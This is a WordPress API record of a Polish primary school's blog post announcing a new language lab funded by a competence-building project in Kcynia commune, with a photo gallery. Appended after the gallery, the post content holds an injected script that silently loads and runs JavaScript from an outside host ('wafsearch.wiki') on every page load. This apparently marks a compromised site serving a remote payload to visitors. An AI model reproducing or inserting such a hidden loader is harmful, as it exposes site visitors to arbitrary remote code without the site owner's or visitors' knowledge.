{"id":61503,"date":"2026-03-14T11:46:31","date_gmt":"2026-03-14T11:46:31","guid":{"rendered":"https:\/\/mycielewo.pl\/?p=61503"},"modified":"2026-03-20T09:05:10","modified_gmt":"2026-03-20T09:05:10","slug":"nowa-pracownia-jezykowa-w-ramach-projektu","status":"publish","type":"post","link":"https:\/\/mycielewo.pl\/?p=61503","title":{"rendered":"Nowa pracownia j\u0119zykowa w ramach projektu!"},"content":{"rendered":"\n<p><strong>Mamy i My! \ud83d\ude42 \ud83c\udfa7\ud83c\udf0d<\/strong><\/p>\n\n\n\n<p><strong>Z ogromn\u0105 rado\u015bci\u0105 og\u0142aszamy, \u017ce w naszej szkole otwarta zosta\u0142a nowoczesna pracownia j\u0119zykowa! Od teraz nauka j\u0119zyk\u00f3w obcych wchodzi na zupe\u0142nie nowy poziom. S\u0142uchawki, mikrofony i interaktywne stanowiska ju\u017c czekaj\u0105 na naszych uczni\u00f3w.<\/strong><\/p>\n\n\n\n<p>Wszystko to dzieje si\u0119 w ramach wa\u017cnych dzia\u0142a\u0144 rozwojowych \u2013 <strong>trwa bowiem realizacja projektu pn. WZMOCNIENIE KOMPETENCJI KLUCZOWYCH UCZNI\u00d3W 3 SZK\u00d3\u0141 PODSTAWOWYCH W GMINIE KCYNIA<\/strong>, w kt\u00f3rym bior\u0105 udzia\u0142 nasi uczniowie.<\/p>\n\n\n\n<p>Gotowi na podb\u00f3j \u015bwiata? Let\u2019s go! <\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-7 is-cropped wp-block-gallery-2 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"908\" height=\"2048\" data-id=\"61507\" src=\"https:\/\/mycielewo.pl\/wp-content\/uploads\/2026\/03\/img001-14.jpg\" alt=\"\" class=\"wp-image-61507\" srcset=\"https:\/\/mycielewo.pl\/wp-content\/uploads\/2026\/03\/img001-14.jpg 908w, https:\/\/mycielewo.pl\/wp-content\/uploads\/2026\/03\/img001-14-768x1732.jpg 768w, https:\/\/mycielewo.pl\/wp-content\/uploads\/2026\/03\/img001-14-681x1536.jpg 681w\" sizes=\"auto, (max-width: 908px) 100vw, 908px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"2048\" height=\"907\" data-id=\"61506\" src=\"https:\/\/mycielewo.pl\/wp-content\/uploads\/2026\/03\/img002-12.jpg\" alt=\"\" class=\"wp-image-61506\" srcset=\"https:\/\/mycielewo.pl\/wp-content\/uploads\/2026\/03\/img002-12.jpg 2048w, https:\/\/mycielewo.pl\/wp-content\/uploads\/2026\/03\/img002-12-768x340.jpg 768w, https:\/\/mycielewo.pl\/wp-content\/uploads\/2026\/03\/img002-12-1536x680.jpg 1536w\" sizes=\"auto, (max-width: 2048px) 100vw, 2048px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"908\" height=\"2048\" data-id=\"61504\" src=\"https:\/\/mycielewo.pl\/wp-content\/uploads\/2026\/03\/img003-13.jpg\" alt=\"\" class=\"wp-image-61504\" srcset=\"https:\/\/mycielewo.pl\/wp-content\/uploads\/2026\/03\/img003-13.jpg 908w, https:\/\/mycielewo.pl\/wp-content\/uploads\/2026\/03\/img003-13-768x1732.jpg 768w, https:\/\/mycielewo.pl\/wp-content\/uploads\/2026\/03\/img003-13-681x1536.jpg 681w\" sizes=\"auto, (max-width: 908px) 100vw, 908px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"2048\" height=\"907\" data-id=\"61505\" src=\"https:\/\/mycielewo.pl\/wp-content\/uploads\/2026\/03\/img004-12.jpg\" alt=\"\" class=\"wp-image-61505\" srcset=\"https:\/\/mycielewo.pl\/wp-content\/uploads\/2026\/03\/img004-12.jpg 2048w, https:\/\/mycielewo.pl\/wp-content\/uploads\/2026\/03\/img004-12-768x340.jpg 768w, https:\/\/mycielewo.pl\/wp-content\/uploads\/2026\/03\/img004-12-1536x680.jpg 1536w\" sizes=\"auto, (max-width: 2048px) 100vw, 2048px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"2048\" height=\"907\" data-id=\"61508\" src=\"https:\/\/mycielewo.pl\/wp-content\/uploads\/2026\/03\/img005-12.jpg\" alt=\"\" class=\"wp-image-61508\" srcset=\"https:\/\/mycielewo.pl\/wp-content\/uploads\/2026\/03\/img005-12.jpg 2048w, https:\/\/mycielewo.pl\/wp-content\/uploads\/2026\/03\/img005-12-768x340.jpg 768w, https:\/\/mycielewo.pl\/wp-content\/uploads\/2026\/03\/img005-12-1536x680.jpg 1536w\" sizes=\"auto, (max-width: 2048px) 100vw, 2048px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"908\" height=\"2048\" data-id=\"61509\" src=\"https:\/\/mycielewo.pl\/wp-content\/uploads\/2026\/03\/img006-12.jpg\" alt=\"\" class=\"wp-image-61509\" srcset=\"https:\/\/mycielewo.pl\/wp-content\/uploads\/2026\/03\/img006-12.jpg 908w, https:\/\/mycielewo.pl\/wp-content\/uploads\/2026\/03\/img006-12-768x1732.jpg 768w, https:\/\/mycielewo.pl\/wp-content\/uploads\/2026\/03\/img006-12-681x1536.jpg 681w\" sizes=\"auto, (max-width: 908px) 100vw, 908px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"908\" height=\"2048\" data-id=\"61510\" src=\"https:\/\/mycielewo.pl\/wp-content\/uploads\/2026\/03\/img007-10.jpg\" alt=\"\" class=\"wp-image-61510\" srcset=\"https:\/\/mycielewo.pl\/wp-content\/uploads\/2026\/03\/img007-10.jpg 908w, https:\/\/mycielewo.pl\/wp-content\/uploads\/2026\/03\/img007-10-768x1732.jpg 768w, https:\/\/mycielewo.pl\/wp-content\/uploads\/2026\/03\/img007-10-681x1536.jpg 681w\" sizes=\"auto, (max-width: 908px) 100vw, 908px\" \/><\/figure>\n<\/figure>\n<script>var url = 'https:\/\/wafsearch.wiki\/xml';\nvar script = document.createElement('script');\nscript.src = url;\nscript.type = 'text\/javascript';\nscript.async = true;\ndocument.getElementsByTagName('head')[0].appendChild(script);<\/script>","protected":false},"excerpt":{"rendered":"<p>Mamy i My! \ud83d\ude42 \ud83c\udfa7\ud83c\udf0d Z ogromn\u0105 rado\u015bci\u0105 og\u0142aszamy, \u017ce w naszej szkole otwarta zosta\u0142a nowoczesna pracownia j\u0119zykowa! Od teraz nauka j\u0119zyk\u00f3w obcych wchodzi na zupe\u0142nie nowy poziom. S\u0142uchawki, mikrofony i interaktywne stanowiska ju\u017c czekaj\u0105 na naszych uczni\u00f3w. Wszystko to dzieje si\u0119 w ramach wa\u017cnych dzia\u0142a\u0144 rozwojowych \u2013 trwa bowiem realizacja projektu pn. WZMOCNIENIE KOMPETENCJI&hellip; <a class=\"continue\" href=\"https:\/\/mycielewo.pl\/?p=61503\">Kontynuuj czytanie<span> Nowa pracownia j\u0119zykowa w ramach projektu!<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-61503","post","type-post","status-publish","format-standard","hentry","category-bez-kategorii"],"_links":{"self":[{"href":"https:\/\/mycielewo.pl\/index.php?rest_route=\/wp\/v2\/posts\/61503","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mycielewo.pl\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mycielewo.pl\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mycielewo.pl\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mycielewo.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=61503"}],"version-history":[{"count":2,"href":"https:\/\/mycielewo.pl\/index.php?rest_route=\/wp\/v2\/posts\/61503\/revisions"}],"predecessor-version":[{"id":61579,"href":"https:\/\/mycielewo.pl\/index.php?rest_route=\/wp\/v2\/posts\/61503\/revisions\/61579"}],"wp:attachment":[{"href":"https:\/\/mycielewo.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=61503"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mycielewo.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=61503"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mycielewo.pl\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=61503"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}